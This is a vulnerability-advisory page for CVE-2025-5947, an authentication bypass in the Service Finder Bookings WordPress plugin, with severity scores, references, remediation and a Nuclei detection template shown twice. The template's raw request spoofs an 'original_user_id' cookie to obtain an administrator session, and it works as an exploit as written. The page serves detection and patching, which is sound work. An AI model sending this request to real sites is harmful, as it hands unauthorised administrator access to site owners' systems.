Service Finder Bookings - Authentication Bypass

CVE-2025-5947

Verified

Description

Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.

Severity

Critical

CVSS Score

9.8

Exploit Probability

43%

Affected Product

service-finder-bookings

Published Date

March 23, 2026

Template Author

sedat4ras

CVE-2025-5947.yaml

id: CVE-2025-5947

info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
  description: |
    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
  impact: |
    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
  remediation: |
    Update to the latest version beyond 6.0.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
    - https://github.com/M4rgs/CVE-2025-5947_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5947
    epss-score: 0.43227
    epss-percentile: 0.97553
    cwe-id: CWE-639
  metadata:
    max-request: 2
    vendor: sf-booking
    product: service-finder-bookings
    publicwww-query: "/wp-content/plugins/sf-booking/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'

      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'

      - type: status
        status:
          - 301
          - 302
# digest: 4a0a00473045022031f97168bd90c6ac23e1fd85ea8617027e6a7bbec69a900dbfbff46f4bcafe1e022100f92275f48d5d33d3ef4599904301ee4233ba8c9dacc70d8a8f0358921fb5496e:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-5947

CWE ID:

cwe-639

References

https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability https://github.com/advisories/GHSA-x2xx-4qhp-2vqx https://github.com/M4rgs/CVE-2025-5947_Exploit https://nvd.nist.gov/vuln/detail/CVE-2025-5947

Remediation Steps

Update to the latest version beyond 6.0.

id: CVE-2025-5947

info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
  description: |
    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
  impact: |
    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
  remediation: |
    Update to the latest version beyond 6.0.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
    - https://github.com/M4rgs/CVE-2025-5947_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5947
    epss-score: 0.43227
    epss-percentile: 0.97553
    cwe-id: CWE-639
  metadata:
    max-request: 2
    vendor: sf-booking
    product: service-finder-bookings
    publicwww-query: "/wp-content/plugins/sf-booking/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'

      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'

      - type: status
        status:
          - 301
          - 302
# digest: 4a0a00473045022031f97168bd90c6ac23e1fd85ea8617027e6a7bbec69a900dbfbff46f4bcafe1e022100f92275f48d5d33d3ef4599904301ee4233ba8c9dacc70d8a8f0358921fb5496e:922c64590222798bb761d5b6d8e72950

Service Finder Bookings - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Service Finder Bookings - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps